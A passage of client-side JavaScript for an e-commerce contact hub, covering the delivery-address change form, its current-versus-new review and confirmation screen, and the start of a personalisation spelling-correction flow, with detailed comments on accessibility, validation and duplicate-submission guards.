           screen would then diff a blank against a blank. The whole code path
           survives: flip CONFIG.address.collectCompany to true and the input,
           the PO Box scan on it and the review row all come back untouched. */
        (CONFIG.address.collectCompany
          ? '<div class="lc-field">' +
              '<label for="ad-company">' + esc(t("address.form.companyLabel")) +
                ' <span style="font-weight:400;color:var(--ink-soft)">' +
                esc(t("shared.optional")) + '</span></label>' +
              '<input id="ad-company" type="text" autocomplete="organization" value="' + esc(d.company) + '" ' +
                'aria-describedby="addr-po-err">' +
            '</div>'
          : '') +

        '<div class="lc-field">' +
          '<label for="ad-addr1">' + esc(t("address.form.addr1Label")) + '</label>' +
          '<p class="lc-hint" id="ad-addr1-hint">' + esc(t("address.poBox.hint")) + '</p>' +
          '<input id="ad-addr1" type="text" autocomplete="address-line1" value="' + esc(d.address1) + '" ' +
            'aria-describedby="ad-addr1-hint ad-addr1-err addr-po-err">' +
          '<p class="lc-field-error" id="ad-addr1-err" role="alert" hidden></p>' +
        '</div>' +

        '<div class="lc-field">' +
          '<label for="ad-addr2">' + esc(t("address.form.addr2Label")) +
            ' <span style="font-weight:400;color:var(--ink-soft)">' +
            esc(t("shared.optional")) + '</span></label>' +
          '<input id="ad-addr2" type="text" autocomplete="address-line2" value="' + esc(d.address2) + '" ' +
            'aria-describedby="addr-po-err">' +
        '</div>' +

        '<p class="lc-field-error" id="addr-po-err" role="alert" hidden></p>' +

        '<div class="lc-grid-2">' +
          '<div class="lc-field">' +
            '<label for="ad-city">' + esc(t("address.form.cityLabel")) + '</label>' +
            '<input id="ad-city" type="text" autocomplete="address-level2" value="' + esc(d.city) + '" ' +
              'aria-describedby="ad-city-err">' +
            '<p class="lc-field-error" id="ad-city-err" role="alert" hidden></p>' +
          '</div>' +
          '<div class="lc-field">' +
            '<label for="ad-province">' + esc(t("address.form.provinceLabel")) + '</label>' +
            '<input id="ad-province" type="text" autocomplete="address-level1" value="' + esc(d.province) + '">' +
          '</div>' +
        '</div>' +

        '<div class="lc-grid-2">' +
          '<div class="lc-field">' +
            '<label for="ad-zip">' + esc(t("address.form.zipLabel")) + '</label>' +
            '<input id="ad-zip" type="text" autocomplete="postal-code" value="' + esc(d.zip) + '" ' +
              'aria-describedby="ad-zip-err">' +
            '<p class="lc-field-error" id="ad-zip-err" role="alert" hidden></p>' +
          '</div>' +
          '<div class="lc-field">' +
            '<label for="ad-country">' + esc(t("address.form.countryLabel")) + '</label>' +
            '<input id="ad-country" type="text" autocomplete="country-name" value="' + esc(d.country) + '" ' +
              'aria-describedby="ad-country-err">' +
            '<p class="lc-field-error" id="ad-country-err" role="alert" hidden></p>' +
          '</div>' +
        '</div>' +

        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn" id="ad-next">' +
            esc(t("address.form.next")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.cancel")) + '</button>' +
        '</div>' +
      '</form>' +

      /* The email offer that used to sit here is gone (client's decision,
         round 4). Halfway down the form is the worst possible place for an
         address: it hands the customer a way to abandon the flow that was about
         to solve their problem in twenty seconds, on the one screen where they
         are already typing the answer. What it was really doing was calming the
         fear that pressing Next commits them to something, so that reassurance
         stays — with no address and no mailto. Worded to say something the
         step-note above the form does not: that one promises the side-by-side
         check, this one names the button they are about to press. */
      '<p class="lc-step-note">' + t("address.form.reassure") + '</p>';
  },

  mount: function () {
    var form = $("#addr-form");
    if (!form) return;
    var poDirty = false;

    /* B3: the Company input may not be rendered at all. Every read of it goes
       through here so an absent field is an empty string rather than a
       TypeError that silently kills the whole submit handler. */
    function fieldVal(id) {
      var f = $("#" + id);
      return f ? f.value : "";
    }

    var required = [
      ["ad-name",    t("address.err.name")],
      ["ad-addr1",   t("address.err.addr1")],
      ["ad-city",    t("address.err.city")],
      ["ad-zip",     t("address.err.zip")],
      ["ad-country", t("address.err.country")]
    ];

    function setErr(id, msg) {
      var e = $("#" + id + "-err"), f = $("#" + id);
      if (!e) return;
      if (msg) { f.setAttribute("aria-invalid","true"); revealAlert(e, msg); }
      else { e.hidden = true; e.textContent = ""; f.setAttribute("aria-invalid","false"); }
    }

    /* Which field the PO Box check itself flagged last time. It must clear ONLY
       its own flag: it used to blanket-reset aria-invalid on addr1/addr2/company
       every run, wiping the "this field is empty" flag the required-field loop
       had just set. The result was a submit that failed silently — nothing
       carried aria-invalid, so nothing was focused or scrolled to, and on a
       phone the page visibly did nothing. */
    var poFlagged = null;
    var PO_FIELD_TO_ID = {
      "company": "ad-company", "address line 2": "ad-addr2", "address line 1": "ad-addr1",
      "town or city": "ad-city", "state or region": "ad-province", "contact name": "ad-name",
      "the address": "ad-addr1"
    };

    /* PO Box check runs on blur, and live only once already in an error state,
       so fixing it feels instant instead of nagging while they type. */
    function checkPoBox() {
      var res = detectPoBox(
        fieldVal("ad-addr1"), fieldVal("ad-addr2"), fieldVal("ad-company"),
        { city: fieldVal("ad-city"), province: fieldVal("ad-province"), name: fieldVal("ad-name") }
      );
      var box = $("#addr-po-err");

      if (poFlagged) {
        /* Only drop the flag if no required-field error currently owns it. */
        var prevErr = $("#" + poFlagged + "-err");
        if (!prevErr || prevErr.hidden) {
          var prev = $("#" + poFlagged);
          if (prev) prev.setAttribute("aria-invalid", "false");
        }
        poFlagged = null;
      }

      if (res.blocked) {
        poDirty = true;
        var target = PO_FIELD_TO_ID[res.field] || "ad-addr1";
        /* The blur/input wiring loop below already guards with `if (!f) return`
           because the Company input is not rendered when
           CONFIG.address.collectCompany is false — this path needed the same
           guard and did not have it. PO_FIELD_TO_ID maps "company" to
           "ad-company", an element that then does not exist, and an uncaught
           TypeError here kills the submit handler outright: the customer presses
           "Next" on the client's flagship flow and the page visibly does
           nothing. Not reachable today (fieldVal returns "" for a missing input,
           so the detector cannot report field:"company"), but it is one config
           change away, and any future hidden scanned field reproduces it
           directly. Fall back to Address line 1, which is always present, so the
           error still has a visible owner to focus and scroll to. */
        var tEl = $("#" + target);
        if (!tEl) { target = "ad-addr1"; tEl = $("#" + target); }
        poFlagged = target;
        if (tEl) tEl.setAttribute("aria-invalid","true");
        /* THE REFUSAL SENTENCE IS KEYED, AND IT IS BUILT HERE RATHER THAN IN
           poScan(). poScan() and PO_COPY are a byte-for-byte port of
           worker/src/validate.js, pinned by worker/test/contract.test.js, which
           evaluates that region in ISOLATION — a t() call inside it would not
           resolve and the two copies would stop being comparable. So the
           detector keeps returning its own plain-English `reason`, and the one
           place a customer ever reads it re-renders it through the dictionary:
           `address.poBox.reason` for the sentence, `address.poBox.kind.<rule>`
           for the 18 names. Both halves of the alert are now editable, which is
           what the merchant is told in COPY-KEYS.md.
           An unknown rule id — a new detector rule with no key yet — falls back
           to the detector's own sentence rather than printing a raw key. */
        var poKindKey = "address.poBox.kind." + (res.rule || "");
        var poReason = Object.prototype.hasOwnProperty.call(COPY, poKindKey)
          ? t("address.poBox.reason", { kind: t(poKindKey) })
          : res.reason;
        revealAlert(box, poReason + " " + t("address.poBox.help"));
        return { ok:false, field:target };
      }
      box.hidden = true; box.textContent = "";
      return { ok:true, field:null };
    }

    /* City / province / name are scanned too, so they must re-check on blur. */
    ["ad-addr1","ad-addr2","ad-company","ad-city","ad-province","ad-name"].forEach(function (id) {
      var f = $("#" + id);
      if (!f) return;                       // Company is optional — see B3 above
      f.addEventListener("blur", checkPoBox);
      f.addEventListener("input", function () { if (poDirty) checkPoBox(); });
    });

    /* A stray browser-Back press must not silently bin a retyped address. */
    var dirty = false;
    function markDirty() { dirty = true; }
    $$("input", form).forEach(function (f) { f.addEventListener("input", markDirty); });
    function onBeforeUnload(ev) {
      if (!dirty) return;
      ev.preventDefault();
      ev.returnValue = "";
      return "";
    }
    window.addEventListener("beforeunload", onBeforeUnload);
    Router.cleanups.push(function () {
      window.removeEventListener("beforeunload", onBeforeUnload);
    });

    required.forEach(function (pair) {
      var f = $("#" + pair[0]);
      f.addEventListener("blur", function () {
        setErr(pair[0], f.value.trim() ? "" : pair[1]);
      });
      f.addEventListener("input", function () {
        if (!$("#" + pair[0] + "-err").hidden && f.value.trim()) setErr(pair[0], "");
      });
    });

    form.addEventListener("submit", function (ev) {
      ev.preventDefault();
      var ok = true, firstBad = null;
      required.forEach(function (pair) {
        var v = $("#" + pair[0]).value.trim();
        if (!v) { setErr(pair[0], pair[1]); ok = false; if (!firstBad) firstBad = pair[0]; }
        else setErr(pair[0], "");
      });
      /* The submit check is the actual guard; the blur check is only UX.
         This same function must also run server-side. */
      var po = checkPoBox();
      if (!po.ok) { ok = false; if (!firstBad) firstBad = po.field; }

      if (!ok) {
        /* Explicit target rather than "first element carrying aria-invalid" —
           the two checks used to fight over that attribute and could leave it
           set on nothing at all. */
        var bad = firstBad ? $("#" + firstBad) : $$("[aria-invalid='true']", form)[0];
        if (bad) {
          bad.focus();
          bad.scrollIntoView({ behavior: reducedMotion() ? "auto" : "smooth", block:"center" });
        }
        return;
      }

      dirty = false;    // moving forward inside the app, not abandoning
      State.address = {
        name:     fieldVal("ad-name").trim(),
        phone:    fieldVal("ad-phone").trim(),
        /* B3: when the Company input is not rendered we CARRY THE EXISTING ONE
           THROUGH rather than sending "". Not collecting a line is not the same
           as clearing it — writing an empty company into the new address would
           silently strip "c/o Sunnyside Rest Home" off a delivery that depends
           on it. Unchanged values produce no review row and no diff. */
        company:  CONFIG.address.collectCompany
                    ? fieldVal("ad-company").trim()
                    : String((State.order && State.order.shippingAddress &&
                              State.order.shippingAddress.company) || "").trim(),
        address1: fieldVal("ad-addr1").trim(),
        address2: fieldVal("ad-addr2").trim(),
        city:     fieldVal("ad-city").trim(),
        province: fieldVal("ad-province").trim(),
        zip:      fieldVal("ad-zip").trim(),
        country:  fieldVal("ad-country").trim()
      };
      /* The client asked for a fade between the form and the comparison. */
      Router.go("addressReview", { fade:true });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* --- ADDRESS CHANGE: Current -> New comparison + mandatory confirmation ---- */
VIEWS.addressReview = {
  render: function () {
    /* Defensive only. clearOrderSession() nulls State.order and State.address
       and empties State.submitted in the same breath, so no UI path reaches
       this view without an order — verified. But the line below dereferences
       order.shippingAddress immediately, and the router's error boundary should
       be a backstop, not the thing that catches an ordinary missing precondition.
       Send them back to the start with a readable message instead of throwing. */
    if (!State.order || !State.order.shippingAddress || !State.address) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("address.heading")) + '</h1>' +
        '<div class="lc-card lc-card--warn"><p>' + t("address.lost.body1") + '</p><p>' +
        t("address.lost.body2") + '</p><p>' +
        '<button type="button" class="lc-btn" data-goto="address-change">' +
        esc(t("shared.btn.startAgain")) + '</button></p></div>';
    }

    var order = State.order, a = order.shippingAddress, n = State.address;

    /* ALREADY-SUBMITTED GUARD — the same one cancelGate, amendGate and
       addressGate carry. This view was missing it, and it is the one view where
       the omission actually fires: after a successful submit the stack is
       [hub, addressForm, addressReview, success], so ONE press of the hardware
       or browser Back button re-rendered this screen from a still-populated
       State.address with a fresh, unticked checkbox and a live Complete Request
       button. Tick, press, and a SECOND address change request goes to the 3PL
       channel and a second "Address Change Request - <name>" page appears in
       Notion for one customer — the exact duplication the sibling guards exist
       to prevent, and a flat contradiction of the checkbox the customer just
       agreed to ("once completed no further changes can be made to my order").

       This is UX, not a guard. The server-side handler must dedupe on
       (order, flow) as well — a client cannot enforce this. */
    if (State.submitted["address-change"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("address.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "address-change");
    }

    /* One entry per address line, in the order of the client's reference image:
       name, phone, then the address itself. Company sits between them WHEN IT
       IS COLLECTED — it is not in the client's list, but if the form asks for
       it and it reaches the 3PL, leaving it out of the only screen where the
       customer proof-reads would hide it. */
    /* [label, currentValue, newValue, isNameLine, alsoEqualTo]
       `alsoEqualTo` is a second accepted spelling of the current value. Shopify
       carries both `province` ("Hampshire") and `provinceCode` ("HAM") and the
       form collects one free-text field, so comparing the new value against
       only one of them told a customer who typed the other that they had
       changed a line they had not touched. */
    /* B3: with CONFIG.address.collectCompany false the customer is never shown a
       Company INPUT — but the row still belongs on this screen whenever the
       order actually carries a company.

       Dropping the entry from `fields` altogether dropped it from BOTH blocks,
       including the CURRENT address, because both are generated from this one
       array. The submit handler deliberately carries the existing company
       through (see VIEWS.addressForm) and it reaches the 3PL in both the current
       and the new address block — so the customer was ticking the client's
       verbatim "I confirm the changes to my order's delivery address are
       correct" against an address that was missing a real line of itself. That
       only bites on orders that carry a company, i.e. the legacy population from
       before the client disabled the checkout field, and every mock has
       company:"" so it is invisible in the prototype.

       The entry therefore always exists and is suppressed at RENDER time below,
       only when both sides are empty. With collectCompany false the two values
       are identical by construction, so it renders as an ordinary unchanged
       line in both blocks: no false "changed" flag, changedCount unaffected. */
    var fields = [
      [t("address.field.name"), a.name || ((a.firstName || "") + " " + (a.lastName || "")).trim(),
                                n.name, true],
      [t("address.field.phone"),   a.phone,   n.phone,   false],
      [t("address.field.company"), a.company, n.company, false]
    ];
    fields = fields.concat([
      [t("address.field.address1"), a.address1, n.address1, false],
      [t("address.field.address2"), a.address2, n.address2, false],
      [t("address.field.city"),     a.city,     n.city,     false],
      [t("address.field.province"), a.province || a.provinceCode, n.province, false,
                                    a.provinceCode || a.province],
      [t("address.field.zip"),      a.zip,      n.zip,      false],
      [t("address.field.country"),  a.country,  n.country,  false]
    ]);

    function val(v) { return v == null ? "" : String(v).trim(); }
    function same(x, y) { return x.toLowerCase() === y.toLowerCase(); }

    var changedCount = 0, curLines = [], newLines = [];

    fields.forEach(function (f) {
      var oldV = val(f[1]), newV = val(f[2]), altV = val(f[4]);
      var cls = "lc-addr-line" + (f[3] ? " lc-addr-line--name" : "");

      /* Empty lines are skipped, never printed as an em-dash. A column of
         dashes is harder to proof-read than the address it is padding out. */
      if (oldV) curLines.push('<p class="' + cls + '">' + esc(oldV) + '</p>');

      if (same(oldV, newV) || (altV && same(altV, newV))) {
        if (newV) newLines.push('<p class="' + cls + '">' + esc(newV) + '</p>');
        return;
      }
      changedCount++;

      if (newV) {
        /* The highlight is invisible in speech and to anyone who cannot
           separate the two tints, so the change is also stated in words. */
        newLines.push('<p class="' + cls + ' lc-is-changed">' +
          '<span class="sr-only">' + esc(t("address.review.changedSr", { field: f[0] })) +
          '</span>' + esc(newV) +
          '<span class="lc-addr-flag" aria-hidden="true">' +
          esc(t("address.review.changedFlag")) + '</span></p>');
      } else {
        /* Genuinely cleared field. Dropping the line silently would hide a real
           change — the customer would never see that their flat number had
           gone. But "State / region removed" reads as an announcement that the
           system has deleted something, which for this audience is alarming and
           gives them nothing to do about it. Phrase it as the thing they can
           actually act on: it is blank, go back if it should not be. */
        newLines.push('<p class="lc-addr-line lc-is-changed lc-is-removed">' +
          esc(t("address.review.blankLine", { field: f[0] })) + '</p>');
      }
    });

    var summary = changedCount === 0
      ? t("address.review.noChanges")
      : (changedCount === 1 ? t("address.review.oneChange")
                            : t("address.review.manyChanges", { n: changedCount }));

    return '<div class="lc-crumbs">' +
        '<button type="button" class="lc-btn--link" data-back>' +
        esc(t("address.review.back")) + '</button></div>' +
      '<h1 data-view-title>' + esc(t("address.review.heading")) + '</h1>' +
      /* Layout-agnostic wording: there is no left or right on a phone, where
         the blocks stack, nor in a screen reader, where everything is linear. */
      '<p class="lc-step-note">' +
        t("address.review.intro", { summary: esc(summary) }) + '</p>' +

      '<section class="lc-card">' +
        '<div class="lc-addr-cmp">' +
          '<div class="lc-addr-cmp__side">' +
            '<h2 class="lc-addr-cmp__h" id="addr-h-current">' +
              esc(t("address.review.currentHeading")) + '</h2>' +
            '<div class="lc-addr-block lc-addr-block--current" role="group" ' +
              'aria-labelledby="addr-h-current">' + curLines.join("") + '</div>' +
          '</div>' +
          /* ONE arrow for the whole comparison. aria-hidden — the two headings
             already say which block is which, in any layout and in speech. */
          '<div class="lc-addr-cmp__arrow" aria-hidden="true">' +
            '<svg viewBox="0 0 44 26" focusable="false" aria-hidden="true">' +
              '<path d="M3 13h33M26 4l10 9-10 9" fill="none" stroke="currentColor" ' +
                'stroke-width="3" stroke-linecap="round" stroke-linejoin="round"/></svg>' +
          '</div>' +
          '<div class="lc-addr-cmp__side">' +
            '<h2 class="lc-addr-cmp__h" id="addr-h-new">' +
              esc(t("address.review.newHeading")) + '</h2>' +
            '<div class="lc-addr-block lc-addr-block--new" role="group" ' +
              'aria-labelledby="addr-h-new">' + newLines.join("") + '</div>' +
          '</div>' +
        '</div>' +
      '</section>' +

      /* Mirrors the honesty of the cancel and amend flows. The request can be
         refused, or the day's dispatch can beat it. */
      '<section class="lc-card lc-card--good">' +
        '<h2>' + esc(t("address.review.next.heading")) + '</h2>' +
        '<p style="margin:0">' + t("address.review.next.body") + '</p>' +
      '</section>' +

      '<section class="lc-card">' +
        '<label class="lc-check" for="ad-confirm">' +
          '<input type="checkbox" id="ad-confirm">' +
          '<span>' + esc(t("address.review.confirmLabel")) + '</span>' +
        '</label>' +
        '<div class="lc-btn-row">' +
          /* aria-disabled, NOT the real disabled attribute. A truly disabled
             button is removed from the tab order, so a keyboard or screen
             reader user tabbed from the checkbox straight past the primary
             action of the client's flagship flow and was never told it existed.
             It stays focusable and explains itself when activated early. */
          '<button type="button" class="lc-btn" id="ad-complete" aria-disabled="true" ' +
            'aria-describedby="ad-complete-hint">' + esc(t("address.review.complete")) +
            '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("address.review.goBack")) + '</button>' +
        '</div>' +
        '<p id="ad-complete-hint" class="lc-step-note" style="margin:12px 0 0" aria-live="polite">' +
          esc(t("address.review.hintTick")) + '</p>' +
        /* Where a failed send is reported — see submitFailed(). */
        '<p class="lc-field-error" id="ad-form-err" role="alert" tabindex="-1" hidden></p>' +
      '</section>';
  },

  mount: function () {
    var box = $("#ad-confirm"), btn = $("#ad-complete"), hint = $("#ad-complete-hint");
    /* render() short-circuits to alreadyRequestedCard() when this flow has
       already been submitted — there is no form to wire up. */
    if (!box || !btn || !hint) return;
    var sending = false;

    box.addEventListener("change", function () {
      btn.setAttribute("aria-disabled", String(!box.checked));
      /* A non-colour cue as well as the grey-to-blue swap, which was the only
         signal that anything had changed on the button itself. */
      btn.textContent = t(box.checked ? "address.review.completeReady" : "address.review.complete");
      hint.textContent = t(box.checked ? "address.review.hintReady" : "address.review.hintTick");
    });

    btn.addEventListener("click", function () {
      if (sending) return;
      /* Belt and braces behind the render() guard: `sending` only protects
         against a double-press within ONE mount, and a Back press re-mounts
         this view with a brand-new closure. If the request is already in,
         never post a second one — bounce to the confirmation instead. */
      if (State.submitted["address-change"]) {
        say(t("shared.say.alreadySent"));
        Router.go("addressReview", { replace:true });
        return;
      }
      if (btn.getAttribute("aria-disabled") === "true") {
        /* Explain, rather than doing nothing at all. */
        say(t("address.review.sayTick"));
        hint.textContent = t("address.review.sayTick");
        box.focus();
        return;
      }
      var order = State.order, n = State.address;
      var adErr = $("#ad-form-err");
      if (adErr) { adErr.hidden = true; adErr.textContent = ""; }
      sending = true;
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("shared.btn.sending"));
      say(t("shared.say.sending"));

      /* THE REAL SEND. The address goes across under the Worker's own field
         names; every one of them is re-sanitised, re-scanned for PO Boxes and
         shape-checked server-side, because the browser's copy of those rules is
         a courtesy and a crafted POST does not run it.

         provinceCode and countryCode are in the contract and are deliberately
         NOT sent: this form collects free text, and a code carried over from
         the old address sitting beside a province the customer has just changed
         is worse than no code at all. */
      submitRequest("address-change", {
        address: {
          name:     n.name,
          phone:    n.phone,
          address1: n.address1,
          address2: n.address2,
          company:  n.company,
          city:     n.city,
          province: n.province,
          zip:      n.zip,
          country:  n.country
        }
      }).then(function (res) {
        sending = false;
        if (!State.order || State.order !== order) {
          if (res && res.ok) say(submitAnnouncement("address-change", res));
          return;
        }

        if (!res.ok) {
          submitFailed("address-change", res, adErr, function (canRetry) {
            /* The button keeps its aria-disabled treatment rather than the real
               attribute, for the same reason it always has: a truly disabled
               button leaves the tab order. On a failure that cannot be retried
               from this screen it is hidden, and "Go back and edit" beside it
               becomes the only, and correct, way on. */
            if (!canRetry) {
              btn.hidden = true;
              /* CLEAR THE HINT BEFORE RETURNING. It is an aria-live region and
                 the checkbox handler last wrote "Ready to send." into it, so
                 the early return left a 70px line reading "Ready to send."
                 directly above "We have NOT sent this to our packing team." The
                 role=alert paragraph below carries the outcome; this line has
                 nothing left to say. */
              if (hint) hint.textContent = "";
              return;
            }
            btn.setAttribute("aria-disabled", "false");
            btn.textContent = t("shared.btn.tryAgain");
            if (hint) hint.textContent = t("address.review.hintRetry");
          });
          return;
        }

        var id = res.requestId;
        var addrEl = evaluate(order);
        /* The SERVER's state, not our stale copy — see interceptVerdict(). An
           OPEN order that picked up a tracking number while this form was on
           screen is accepted by the Worker and reported back as
           TRACKING_ASSIGNED; building the confirmation from the browser's copy
           told that customer we would catch it in time and told staff the
           fulfilment order was still open, for a parcel already labelled with
           the OLD address. */
        var addrIntercept = interceptVerdict(res, addrEl);
        var newBlock = [
          n.name, n.company, n.address1, n.address2,
          [n.city, n.province, n.zip].filter(Boolean).join(", "),
          n.country, n.phone
        ].filter(function (l) { return l && String(l).trim(); }).join("\n");

        var ctx = buildDiscordContext(order, {
          currentAddress: addressBlock(order.shippingAddress),
          newAddress: newBlock
        });

        /* ONLY NOW. Set before the result is built, as it always was, but on
           the far side of a confirmed ok:true — a failed submit returned above
           and left this flow retryable. */
        State.submitted["address-change"] = id || true;
        State.result = {
          requestId: id,
          discordTitle: t("preview.title"),
          discord: CONFIG.discord.addressChange(ctx),
          notion: baseNotionProps(order, "address-change",
                    "Customer requested a delivery address change on " + order.name + ". " +
                    "New address: " + newBlock.replace(/\n/g, ", "),
                    fmtDateTime(new Date().toISOString()) + " — Request " + idForLog(id) +
                    " raised from the contact hub. Address checked for PO Box: passed, in the " +
                    "browser and again server-side. " +
                    (addrIntercept
                      ? interceptStaffLine(addrEl) + " — INTERCEPTION REQUEST: the label already " +
                        "carries the OLD address, so a relabel is needed, not just a Shopify " +
                        "edit. "
                      : "Shopify shippingAddress to be updated only while the fulfillment order " +
                        "is OPEN.")),
          /* "on its way to" / "applied it" asserted the change was done. It is a
             request the 3PL can refuse, or that the day's dispatch can beat. */
          heading: t("address.success.heading"),
          blurb: t("address.success.blurb", { order: order.name, email: order.email }),
          flow: "address-change",
          extraNote: joinNotes(
                       relayNote(res), recordNote(res),
                       addrIntercept
                         ? interceptSuccessNote(addrEl, true)
                         : t("address.success.note")),
          announce: submitAnnouncement("address-change", res)
        };
        Router.go("success", { fade:true });
      })
      /* See the cancel flow. */
      .catch(function (e) {
        sending = false;
        if (window.console && console.error) console.error("[contact-hub] submit render", e);
        try {
          var told = !!State.submitted["address-change"];
          submitFailed("address-change",
            told ? { ok:false, told:true, reason:"render",
                     requestId: typeof State.submitted["address-change"] === "string"
                       ? State.submitted["address-change"] : "" }
                 : { ok:false, told:false, reason:"unknown" },
            adErr,
            function (canRetry) {
              if (!canRetry) { btn.hidden = true; if (hint) hint.textContent = ""; return; }
              btn.setAttribute("aria-disabled", "false");
              btn.textContent = t("shared.btn.tryAgain");
              if (hint) hint.textContent = t("address.review.hintRetry");
            });
        } catch (e2) { /* never throw out of a catch handler */ }
      });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   FIX MY SPELLING (round 5) — the personalisation amendment flow.

   THREE SCREENS, mirroring the address flow the client already signed off:
     spellingGate    — eligibility, plus "which item?" when there is more than one
     spellingForm    — the current spelling, the new one, and the large re-read
     spellingReview  — current → new in the address-diff language, then the
                       mandatory checkbox and the send

   WHAT THIS FLOW CAN AND CANNOT KNOW.
   Shopify has NO customisation-status field. There is no signal anywhere in the
   Admin API for "the embroidery machine has started on this one", and there is
   no honest way to derive one — the 3PL fulfils inside MabangErp3 and Shopify
   only hears about it afterwards. So this flow gates on exactly the same
   fulfilment state machine as cancel, amend and address-change, and then SAYS
   SO in the copy: the stitching may already have started, and the packing team
   has to confirm. Inventing a `customisationStarted` field here would be
   inventing a fact, and the customer would be the one to find out.

   NO RETURNS CTA ANYWHERE IN THIS FLOW (round-2 rule A3, and see the note in
   ineligibleCard()). A personalised item is the one genuinely non-returnable
   thing in the catalogue.
   =========================================================================== */

/* Shared header for all three screens, so a customer who lands on step 2 and
   presses Back never sees the flow rename itself. */
function spellingTitle() { return t("spelling.title"); }

/* The honest one-liner about what we can and cannot see. Two versions, exactly
   as the sibling flows do it, and BOTH of them talk about our records rather
   than about the parcel (P0). */
function spellingStepNote(el) {
  return t(el.interceptOnly ? "spelling.stepNote.intercept" : "spelling.stepNote.open");
}

/* --- FIX MY SPELLING: gate ------------------------------------------------ */
VIEWS.spellingGate = {
  render: function () {
    var order = State.order, el = evaluate(order);

    if (!el.actionable) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        policyNote(el) +
        ineligibleCard(order, "fix-spelling");
    }
    if (State.submitted["fix-spelling"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "fix-spelling");
    }

    var items = personalisedItems(order);

    /* NOTHING TO CORRECT. Never a dead end: the customer came here because
       something about their order is wrong, and "no personalised items" is an
       answer about our data, not about their problem. Route them to the flow
       that handles "the wrong thing is on my order", which is what they almost
       certainly mean.

       It also has to be honest about the interesting case — a personalisation
       that was never captured. If the product page's text box was missed, or
       the property was written under a different key, the name genuinely is not
       on the order and the 3PL will stitch nothing. That is worth an email, and
       saying so here is cheaper than the customer discovering it on delivery. */
    if (!items.length) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
        orderSummaryCard(order) +
        '<section class="lc-card lc-card--info">' +
          '<h2>' + esc(t("spelling.none.heading")) + '</h2>' +
          '<p>' + t("spelling.none.body1", { order: esc(order.name) }) + '</p>' +
          '<p>' + t("spelling.none.body2") + '</p>' +
          '<p style="margin:0">' + t("spelling.none.body3", {
            mailHref: 'mailto:' + esc(CONFIG.store.supportEmail) + '?subject=' +
              encodeURIComponent(t("spelling.none.subject", { order: order.name }))
          }) + '</p>' +
        '</section>' +
        '<div class="lc-btn-row">' +
          '<button type="button" class="lc-btn" data-goto="amend-order">' +
            esc(t("spelling.none.amendButton")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-home>' +
            esc(t("shared.btn.backToHub")) + '</button>' +
        '</div>';
    }

    /* EXACTLY ONE — no pointless "pick the only option" screen. Same
       stack-replacement trick addressGate uses, so Back from the form goes to
       the hub rather than to a one-item radio list. */
    if (items.length === 1) {
      State.spelling = spellingDraftFor(items[0]);
      Router.stack[Router.stack.length - 1] = { name:"spellingForm", params:{} };
      /* Router.go() already pushed "#spellingGate" before calling render(), so
         without this the address bar names a view that is not on the stack.
         Navigation itself is unaffected (popstate keys off lcDepth), but the
         fragment is wrong and anything that later reads it would be too. */
      Router._pushHistory("spellingForm", true);
      return VIEWS.spellingForm.render({});
    }

    /* SEVERAL. Twins, or two grandchildren, and the names are often one letter
       apart — so each row shows the SPELLING as the primary text and the
       product underneath it. Choosing by product name would be choosing between
       two identical-looking rows. */
    var key = personalisationKey();
    var rows = items.map(function (li, i) {
      var current = String(lineItemProperty(li, key)).trim();
      return '<label class="lc-radio-row">' +
        '<input type="radio" name="sp-item" value="' + i + '"' + (i === 0 ? " checked" : "") + '>' +
        '<span><b class="lc-spell-current">' + esc(current) + '</b>' +
        '<small>' + esc(itemLabel(li)) + '</small></span></label>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
      '<p class="lc-step-note">' + t("spelling.pick.intro") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      policyNote(el) +
      '<form class="lc-card" id="spell-pick-form" novalidate>' +
        '<h2>' + esc(t("spelling.pick.heading")) + '</h2>' +
        '<p class="lc-hint" style="margin:0 0 12px">' + t("spelling.pick.hint") + '</p>' +
        '<div class="lc-radio-list">' + rows + '</div>' +
        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn">' + esc(t("spelling.pick.submit")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.cancel")) + '</button>' +
        '</div>' +
      '</form>';
  },

  mount: function (p) {
    /* The one-item path rewrote the stack entry in render(); mount the view
       that actually got rendered. */
    if (Router.current().name === "spellingForm") { VIEWS.spellingForm.mount(p); return; }

    var form = $("#spell-pick-form");
    if (!form) return;
    form.addEventListener("submit", function (ev) {
      ev.preventDefault();
      var items = personalisedItems(State.order);
      var checked = $("input[name='sp-item']:checked", form);
      var li = items[Number(checked && checked.value)] || items[0];
      if (!li) return;
      State.spelling = spellingDraftFor(li);
      Router.go("spellingForm", { fade:true });
    });
  }
};

/* The draft object every screen below reads. `item` is the line item OBJECT,
   compared by identity — a draft therefore cannot survive a switch to a
   different order, which is exactly the behaviour State.amend already has. */
function spellingDraftFor(li) {
  return {
    item: li,
    /* NFC — see spellNfc(). The value is displayed here, compared against what
       the customer types, and sent to Discord and Notion; all three want the
       same normal form as the input field produces. */
    current: spellNfc(lineItemProperty(li, personalisationKey())).trim(),
    next: ""
  };
}

/* True when the draft still refers to a line item on the CURRENT order. Guards
   every screen after the gate: a customer can reach spellingForm directly via
   the browser Back button, an idle-timeout wipe, or a pasted URL fragment. */
function spellingDraftValid() {
